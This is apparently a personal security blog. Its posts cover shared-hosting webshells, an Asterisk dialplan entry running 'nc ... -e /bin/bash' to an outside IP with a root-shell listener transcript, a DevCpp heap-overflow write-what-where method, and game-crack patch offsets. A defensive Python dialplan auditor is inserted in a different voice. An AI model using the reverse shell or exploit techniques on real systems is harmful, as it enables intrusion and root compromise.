About

welcome to my little blog!
i don't really expect anybody to actually ever read this, so i'll just use it to publish some of the lesser InfoSec-related evils i know i'll get up to...
buckle up for here it is:


The Blunt Shell In Perl

experienced an epic fail yesterday because i didn't have a perl version of the blunt shell. obviously this required immediate fixing...


The Blunt Shell

the evils of shared webhosting!
php without safe_mode is a hazard... the blunt shell attached to this post is a little script i cooked up last night that demonstrates this quite nicely. you'll want to check out CMS config files, for example... had a lot of phun with it. you'd be surprised how many people reuse passwords.


Asterisk Security

asterisk runs as root by default. if you can create your own dialplans then you might wanna check out the System() application ...

[george-pentest]
exten => 666,1,Answer
exten => 666,2,System(nc 146.231.123.57 80 -e '/bin/bash')
exten => 666,3,Hangup
...
D:\Documents and Settings\g05p3292>nc -l -p  80
whoami
root
^C
D:\Documents and Settings\g05p3292>
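from the defender's side, the thing to audit is every dialplan step that hands a string to a shell while asterisk is still running as root. the script below is an added example, not something from this post: it parses a small extensions.conf (constructed for this example; only the application names System and TrySystem are real asterisk applications) and flags shell-spawning steps, also noting when channel data such as ${CALLERID(num)} is interpolated into the command.

```python
import re

# Asterisk dialplan applications whose argument is handed to /bin/sh. With asterisk
# running as root, each one is a root shell for whoever can edit the dialplan.
SHELL_APPS = {"system", "trysystem"}

CONTEXT_RE = re.compile(r"^\[(?P<ctx>[^\]]+)\]$")
LINE_RE = re.compile(r"^(?P<kw>exten|same)\s*=>\s*(?P<fields>.+)$")
APP_RE = re.compile(r"^(?P<app>[A-Za-z]+)\s*(?:\((?P<args>.*)\))?$")

# Constructed extensions.conf for this example; only the application names are real.
SAMPLE_EXTENSIONS_CONF = """\
[custom-logging]
exten => 200,1,Answer()
 same => n,System(echo ${CALLERID(num)} >> /var/log/calls.log)
 same => n,TrySystem(/usr/local/bin/notify.sh)
 same => n,Hangup()
"""

def parse_dialplan(conf_text):
    """One dict per 'exten =>' / 'same =>' line, tagged with its [context]."""
    entries, context = [], None
    for lineno, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment
        ctx = CONTEXT_RE.match(line)
        if ctx:
            context = ctx.group("ctx")
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        if m.group("kw") == "exten":
            ext, prio, rest = (f.strip() for f in m.group("fields").split(",", 2))
        else:  # 'same =>' continues the extension of the previous line
            ext = entries[-1]["exten"] if entries else ""
            prio, rest = (f.strip() for f in m.group("fields").split(",", 1))
        app = APP_RE.match(rest)
        if app:
            entries.append({"line": lineno, "context": context, "exten": ext,
                            "prio": prio, "app": app.group("app"),
                            "args": app.group("args") or ""})
    return entries

def find_shell_exec(conf_text):
    # Flag shell-spawning steps; note when channel data feeds the command string.
    findings = []
    for e in parse_dialplan(conf_text):
        if e["app"].lower() in SHELL_APPS:
            e["interpolates_channel_data"] = "${" in e["args"]
            findings.append(e)
    return findings
```

run it over the real /etc/asterisk/extensions.conf and every hit is a line to justify or remove, and a reason to run asterisk as an unprivileged user.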

DevCpp Heap Overflow

the other day i was reading an eZine in DevCpp 4.9.9.2 - don't ask me why...
when i came across this little critter:
#include lines with more than 0x8007 chars trigger it.

CODE:00401CC4 loc_401CC4:   ; CODE XREF: sub_401C6C+1Ej
CODE:00401CC4                 mov     eax, [eax]
CODE:00401CC6                 mov     [edx], eax
CODE:00401CC8                 mov     [eax+4], edx
CODE:00401CCB
CODE:00401CCB loc_401CCB:   ; CODE XREF: sub_401C6C+39j
CODE:00401CCB                 pop     ebx
CODE:00401CCC                 retn
CODE:00401CCC sub_401C6C      endp

because we control eax and edx at this point we can write an arbitrary 4 bytes anywhere in memory. so i chose to just alter the return address on the stack and let the retn do the rest. because of the instruction @00401CC8 we must take care which address to use, since its bytes will be 'executed' upon redirection.


Crimsonland Immortality Crack

crimsonland is a fantastic little game that will provide you with countless hours of fun. last year my digsmate dean and i had a survival mode competition and we eventually reached scores of about 5 million (the pulse gun is more powerful than you might expect!). after we had reached the maximum scores that we considered humanly possible i started looking into creating an immortality crack just to see how hectic the game can get. a couple of hours with w32dasm v10 revealed the following offsets in the executable:
0x4255B6 - replace by jmp instruction -> no injury through touch
0x426A14 - invert jump instruction -> monsters die when they touch the player
0x426AC2 - nop out the sub instruction -> prevent injury from shots
here's an in-game screenshot of the crack in action:

the only way to actually still die is to select some sort of suicide perk.
have fun!
